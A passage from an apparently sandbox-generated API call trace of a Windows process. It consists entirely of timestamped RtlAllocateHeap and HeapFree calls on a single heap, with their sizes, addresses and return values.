Size=0xc) returned 0x976918 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976948 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976ac8 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56938 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56aa0 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56968 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976828 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9768d0 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976888 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ab0 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e56848 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e569f8 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e30 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e569f8 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e30 | out: hHeap=0x970000) returned 1 [0121.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56848 | out: hHeap=0x970000) returned 1 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ad0 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56848 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56998 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56998 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976eb0 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56848 | out: hHeap=0x970000) returned 1 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a40 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x971e48 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a70 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x971e78 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f80 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971e48 | out: hHeap=0x970000) returned 1 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56830 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56878 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a70 | out: hHeap=0x970000) returned 1 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56980 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56998 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x971e48 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a70 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e569b0 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56860 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a10 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56848 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568d8 [0121.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e569c8 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ad0 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56878 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56980 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56998 | out: hHeap=0x970000) returned 1 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e56830 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ab8 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976eb0 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e569e0 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ab8 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976eb0 | out: hHeap=0x970000) returned 1 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e569e0 | out: hHeap=0x970000) returned 1 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e569e0 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x971eb0 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ae8 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56bd8 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f00 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971eb0 | out: hHeap=0x970000) returned 1 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a88 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56998 [0121.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ae8 | out: hHeap=0x970000) returned 1 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56878 [0121.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a40 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ab8 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x971eb0 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e569f8 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a28 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56800 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ad0 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ae8 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a58 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56908 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e569e0 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56998 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56878 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e56a40 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a88 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fe0 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fe0 | out: hHeap=0x970000) returned 1 [0121.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a88 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56950 [0121.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56818 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fe0 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fe0 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56950 | out: hHeap=0x970000) returned 1 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56878 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e56c10 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56980 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e56c38 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fb0 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56c10 | out: hHeap=0x970000) returned 1 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a40 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56980 | out: hHeap=0x970000) returned 1 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ab8 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56830 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56890 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e56c10 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56950 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568a8 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56998 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e569e0 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56920 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56980 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568c0 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56878 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56890 | out: hHeap=0x970000) returned 1 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e56a40 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ab8 [0121.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f90 [0121.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f90 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ab8 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a40 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56818 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fe0 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fe0 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a88 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e56c60 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a40 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e56c80 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f90 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56c60 | out: hHeap=0x970000) returned 1 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56830 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a40 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56878 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568f0 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e56c60 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56890 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56bc0 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b60 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56b78 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b18 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b30 [0121.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b00 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56878 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e568f0 | out: hHeap=0x970000) returned 1 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e568f0 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a40 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fc0 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fc0 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e568f0 | out: hHeap=0x970000) returned 1 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a40 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a88 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976eb0 | out: hHeap=0x970000) returned 1 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a88 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e56ca8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56ab8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e56cc8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fe0 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ca8 | out: hHeap=0x970000) returned 1 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56830 [0121.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56878 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ab8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568f0 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e56ca8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b90 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ba8 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56b48 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976ab0 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976828 [0121.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976888 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9768d0 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56878 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e568f0 | out: hHeap=0x970000) returned 1 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x9769d8 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769f0 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fa0 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fa0 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769d8 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769f0 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a08 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fa0 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fa0 | out: hHeap=0x970000) returned 1 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769f0 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e56cf0 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a08 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e56d18 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e30 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56cf0 | out: hHeap=0x970000) returned 1 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56818 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56a40 [0121.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56830 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56a88 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ab8 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e56cf0 [0121.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56878 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e568f0 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a08 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e570e8 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e57130 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e57100 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e57070 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a40 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56818 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56830 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56a88 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ab8 | out: hHeap=0x970000) returned 1 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e570d0 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e570b8 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fa0 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e570b8 | out: hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fa0 | out: 